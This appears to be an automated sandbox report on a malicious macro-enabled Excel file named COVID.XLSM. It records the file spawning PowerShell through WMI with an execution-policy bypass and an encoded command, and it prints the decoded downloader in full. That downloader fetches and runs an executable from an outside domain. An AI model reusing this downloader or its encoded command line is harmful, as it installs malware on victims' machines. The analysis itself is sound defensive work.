CIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$COVID.XLSM Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC3CB.tmp Jump to behavior
Source: classification engine Classification label: mal76.expl.evad.winXLSM@5/4@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: COVID.XLSM Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: COVID.XLSM Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: COVID.XLSM Initial sample: OLE zip file path = xl/media/image1.png
Source: COVID.XLSM Initial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
Source: COVID.XLSM Initial sample: OLE zip file path = xl/comments1.xml
Source: COVID.XLSM Initial sample: OLE zip file path = xl/comments2.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2104750981.0000000002926000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbemen source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2104791872.0000000002A10000.00000002.00000001.sdmp
Source: COVID.XLSM Initial sample: OLE summary subject = Removed Hoo36:HA/HB/HQ and corresponding crosswalk and 2nd modifer codes per CABHA policy and IU82.

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3060 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000004.00000002.2103643804.0000000000372000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA
Encrypted powershell cmdline option found
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded function PS-InstallerV2 { param( [Parameter(Mandatory=$true, Position=0)] [string] $link, [Parameter(Mandatory=$true, Position=1)] [string] $endpoint, [Parameter(Mandatory=$true, Position=2)] [string] $file_dir, [Parameter(Mandatory=$true, Position=3)] [string] $file_name, [Parameter(Mandatory=$true, Position=4)] [string]$extension, [Parameter(Mandatory=$true, Position=5)] [bool] $use_access, [Parameter(Position=6)] [string] $access_string ) $internal_memory = New-Object IO.MemoryStream $req_str = $link + "/" + $endpoint if ($use_access) { $req_str = $req_str + "/" + $access_string } $save_path = $file_dir + "\" + $file_name + "." + $extension $request = [System.Net.WebRequest]::Create("$req_str") $response = $request.GetResponse() $response_stream = $response.GetResponseStream() $response_stream.CopyTo($internal_memory) Set-Content $save_path -Value $internal_memory.ToArray() -Encoding Byte $response_stream.Close() $internal_memory.Close() Start-Process -FilePath $save_path}PS-InstallerV2 "https://awmelisers.com" "api/v3/achyranthes/contrapolarization/kulturkreis" "C:\ProgramData" "Awmelisers Service" "exe" $False
